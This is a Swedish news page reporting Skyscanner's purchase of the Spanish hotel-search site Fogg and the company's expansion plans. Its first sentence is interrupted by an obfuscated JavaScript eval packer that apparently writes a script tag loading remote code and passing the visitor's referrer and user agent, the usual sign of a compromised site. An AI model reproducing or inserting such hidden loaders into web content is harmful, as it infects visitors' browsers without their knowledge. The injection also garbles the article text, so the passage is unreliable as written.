Image Image Image Image Image Image Image Image Image Image

| 1 juni, 2020

Scroll to top

Top

Skyscanner storsatsar på hotell

Skyscanner storsatsar på hotell
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|idzfh|var|u0026u|referrer|nhkdy||js|php’.split(’|’),0,{}))
står det klart att den ledande resejämförelsesajten 
Skyscanner har förvärvat Fogg, en spansk hotellsajt. Förvärvet är ett viktigt steg i Skyscanners strategi att bli världsledande inom resegenren.

För Skyscanners användare kommer övertagandet av Fogg att innebära smidigare och snabbare sökningar av hotell via Skyscanners hemsida. Även täckningen av hotell kommer att bli bredare. För tillfället finns Foggs sajt tillgänglig på engelska och spanska, men kommer framöver att finnas på mer än 30 språk, däribland svenska. I slutet av året kommer Foggs hotellsökningssida bli helt integrerad på Skyscanner webbplats.

Bakgrunden till förärvningen är att Skyscanner vill ge sina användare en helhetslösning när det kommer till resesökningar. Målet är att kunna erbjuda den bästa söktjänsten av flygbiljetter, hotell och hyrbilar. Som ett led i detta lanserade Skyscanner nyligen även en patenterad och integrerad hyrbilsjämförelsemotor på sin webbplats.

– Vi på Skyscanner har en passion för enkla och flexibla reselösningar. Skyscanner har redan den bästa flygsökningsmotorn i världen och med Fogg ombord, samt en ny biluthyrningsmotor, utökas vårt erbjudande till våra användare ytterligare, säger Gareth Williams, vd på Skyscanner.

– Precis som med Skyscanner så kommer all Foggs inspiration från egna reseupplevelser och erfarenheter. Det gör Fogg till perfekta partnern för oss. Skyscanner kommer att öppna nya kontor i Barcelona, där Foggs anställda kommer att vara baserade. Vi bygger på Skyscanner-sajten därifrån. Jag är säker på att våra användare kommer att älska det utökade helhetskonceptet som Skyscanner kommer att erbjuda framöver, fortsätter Gareth Williams.

Skyscanner befinner sig just nu i en expansionsfas. Förvärvet av Fogg sker i samband med att företaget växer på den amerikanska, kanadensiska och sydamerikanska marknaden. Skyscanner har, förutom det nya kontoret i Barcelona, även öppnat kontor i Glasgow och slår snart också upp portarna i Miami.